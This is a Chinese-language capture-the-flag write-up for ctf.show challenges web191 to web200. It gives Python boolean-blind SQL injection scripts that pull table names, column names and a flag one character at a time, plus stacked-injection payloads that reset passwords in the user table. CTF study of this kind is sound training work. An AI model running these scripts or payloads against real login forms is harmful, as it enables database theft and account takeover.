web191

多了一个正则绕过
上脚本布尔盲注

用ord

#author:yu22x
import requests
import string
url="http://70adf0cb-2208-4974-b064-50a4f4103541.challenge.ctf.show/api/index.php"
s=string.ascii_letters+string.digits
flag=''
for i in range(1,45):print(i)for j in range(32,128):#跑库名# data={#     'username':f"'||if(ascii(substr(database(),{i},1))={j},1,0)#",#     'password':'1'# }#跑表名# data={#     'username':f"'||if(ascii(substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))={j},1,0)#",#     'password':'1'# }#跑列名# data={#     'username':f"'||if(ascii(substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))={j},1,0)#",#     'password':'1'# }#跑数据data={'username':f"'||if(ord(substr((select f1ag from ctfshow_fl0g),{i},1))={j},1,0)#",'password':'1'}r=requests.post(url,data=data)if("\\u5bc6\\u7801\\u9519\\u8bef" in r.text):flag+=chr(j)print(flag)break

web192

直接不用ord了，改成跑字符。

#author:yu22x
import requests
import string
url="http://960c0983-53e2-470d-8482-88d1edee6500.challenge.ctf.show/api/index.php"
s=string.ascii_letters+string.digits
flag=''
for i in range(1,45):print(i)for j in range(32,128):#跑表名# data={#     'username':f"'||if((substr((select group_concat(table_name)from information_schema.tables where table_schema=database()),{i},1))='{chr(j)}',1,0)#",#     'password':'1'# }#跑列名# data={#     'username':f"'||if((substr((select group_concat(column_name)from information_schema.columns where table_name='ctfshow_fl0g'),{i},1))='{chr(j)}',1,0)#",#     'password':'1'# }#跑数据data={'username':f"'||if((substr((select f1ag from ctfshow_fl0g),{i},1))='{chr(j)}',1,0)#",'password':'1'}r=requests.post(url,data=data)if("\\u5bc6\\u7801\\u9519\\u8bef" in r.text):flag+=chr(j)print(flag)break

但是这个东西太慢了找了一个稍微快一点的

#@Auth：Sentiment
import requests
url='http://960c0983-53e2-470d-8482-88d1edee6500.challenge.ctf.show/api/index.php'
flag=''
for i in range(1,100):m=32n=127while 1:mid=(m+n)//2data={#'username':"admin' and (substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<'{}'#".format(i,chr(mid)),#ctfshow_fl0g,ctfshow_user#'username':"admin' and (substr((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'),{},1))<'{}'#".format(i, chr(mid)),  # id,f1ag'username':"admin' and (substr((select f1ag from ctfshow_fl0g),{},1))<'{}'#".format(i, chr(mid)),  # ctfshow{7b03d3e9-190a-43f2-9b13-008c7d2ce6f7}'password':0}#print(data)r=requests.post(url=url,data=data)if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:n=midelse:m=midif (m + 1 == n):flag += chr(m)print(flag.lower())break

web193

#@Auth：Sentiment
import requests
url='http://617039c3-6190-4487-ab63-7d139273ad98.challenge.ctf.show/api/index.php'
flag=''
for i in range(100):for j in 'abcdefghijklmnopqrstuvwxyz0123456789-_,{}':data={#'username':"admin' and (select group_concat(table_name) from information_schema.tables where table_schema=database())like'{}'#".format(flag+j+'%'),#ctfshow_flxg#'username':"admin' and (select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg')like'{}'#".format(flag+j+'%'),  # id,f1ag'username':"admin' and (select f1ag from ctfshow_flxg)like'{}'#".format(flag+j+'%'),  # ctfshow{7b03d3e9-190a-43f2-9b13-008c7d2ce6f7}'password':0}r=requests.post(url=url,data=data)if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:flag+=jprint(flag)break

web194

上一个脚本继续用

web195

堆叠注入

 目标存在sql注入漏洞目标未对";"号进行过滤目标中间层查询数据库信息时可同时执行多条sql语句

username填写0是显示密码错误就说明可以在这里进行堆叠，用命令把密码设置一下

0;update`ctfshow_user`set`pass`=1
1

或者

下面这两句话都是在username进行的，密码随便填写
0;update(ctfshow_user)set`username`=1;(必须是0，不然的话没有回显显示用户名错误)
1;update(ctfshow_user)set`pass`=1;
然后username=1&password=1登录就行

web196

过滤了select但是联合注入是可以绕过的

成功的原因就是进行注入的时候0返回null，然后select(常数)就会把常数放在row里面

username=0;select(1);
password=1

web197

$sql = "select pass from ctfshow_user where username = {$username};";
已知这个表叫做ctfshow_user

username=0;show tables;
password=ctfshow_user

web 198–web200

与上题同